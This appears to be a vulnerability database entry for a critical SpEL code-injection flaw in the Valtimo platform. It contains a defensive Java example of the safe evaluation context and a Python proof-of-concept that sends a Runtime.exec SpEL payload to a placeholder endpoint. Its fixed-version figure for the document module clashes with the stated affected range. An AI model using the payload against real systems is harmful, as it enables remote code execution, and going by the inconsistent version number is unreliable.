Security Vulnerability Report

CVE-2026-42555

Published: 2026-05-14 17:16:22
Last Modified: 2026-05-14 18:13:34

Description

Valtimo is an open-source business process automation platform. com.ritense.valtimo:document from 12.0.0 to before 12.32.0, com.ritense.valtimo:case from 13.0.0 to before 13.23.0, and com.ritense.valtimo:contract from 13.4.0 to before 13.23.0 evaluate Spring Expression Language (SpEL) expressions from user-supplied input using StandardEvaluationContext, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Execution and credential exfiltration. This vulnerability is fixed in com.ritense.valtimo:document 2.32.0, com.ritense.valtimo:case 13.23.0, and com.ritense.valtimo:contract 13.23.0.
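The root cause named above, as an added example that is not Valtimo's code: the unsafe StandardEvaluationContext pattern beside the hardened SimpleEvaluationContext form, evaluating the same user-supplied expressions. It assumes Spring's spring-expression module on the classpath; the CaseRecord class and its status field are constructed for illustration.

```java
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelContextDemo {

    // Constructed root object standing in for a case/document record (illustration only).
    public static class CaseRecord {
        private final String status;
        public CaseRecord(String status) { this.status = status; }
        public String getStatus() { return status; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Vulnerable pattern from the advisory: StandardEvaluationContext lets the
    // expression reference any type via T(...), call any method and use constructors.
    static Object evaluateUnsafe(String userExpression, CaseRecord root) {
        StandardEvaluationContext ctx = new StandardEvaluationContext(root);
        return PARSER.parseExpression(userExpression).getValue(ctx);
    }

    // Hardened form: SimpleEvaluationContext restricts evaluation to data binding on
    // the root object; T(...) type references, bean references and reflective method
    // calls are rejected, so the payload shape in this advisory cannot run.
    static Object evaluateSafe(String userExpression, CaseRecord root) {
        SimpleEvaluationContext ctx = SimpleEvaluationContext
                .forReadOnlyDataBinding()
                .withRootObject(root)
                .build();
        return PARSER.parseExpression(userExpression).getValue(ctx);
    }

    public static void main(String[] args) {
        CaseRecord record = new CaseRecord("OPEN");
        String benign = "status == 'OPEN'";                   // a legitimate rule-style expression
        String hostile = "T(java.lang.Runtime).getRuntime()"; // the type reference the advisory describes
        System.out.println("safe/benign  -> " + evaluateSafe(benign, record)); // true
        try {
            evaluateSafe(hostile, record);
        } catch (EvaluationException e) {
            // SimpleEvaluationContext's type locator refuses every T(...) lookup
            System.out.println("safe/hostile -> rejected: " + e.getMessage());
        }
        // evaluateUnsafe(hostile, record) would hand back a live java.lang.Runtime.
    }
}
```

Validating input against an allow-list of expected expression shapes is a useful second layer, but the context choice is what removes the type and method access the advisory describes.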

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

com.ritense.valtimo:document 12.0.0 - 12.31.x
com.ritense.valtimo:case 13.0.0 - 13.22.x
com.ritense.valtimo:contract 13.4.0 - 13.22.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-valtimo-instance/api/vulnerable_endpoint"

# Malicious SpEL payload to execute 'id' command on Linux server
# StandardEvaluationContext allows access to java.lang.Runtime
spel_payload = "T(java.lang.Runtime).getRuntime().exec('id')"

# Example payload structure based on common SpEL injection points
payload_data = {
    "inputField": spel_payload
}

# Authentication is required (ADMIN role)
headers = {
    "Authorization": "Bearer <ADMIN_ACCESS_TOKEN>",
    "Content-Type": "application/json"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, json=payload_data, headers=headers)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check server for command execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")
```

Weakness

CWE-94 (Improper Control of Generation of Code ('Code Injection'))

References

https://github.com/valtimo-platform/valtimo/security/advisories/GHSA-j7j9-5253-f7vh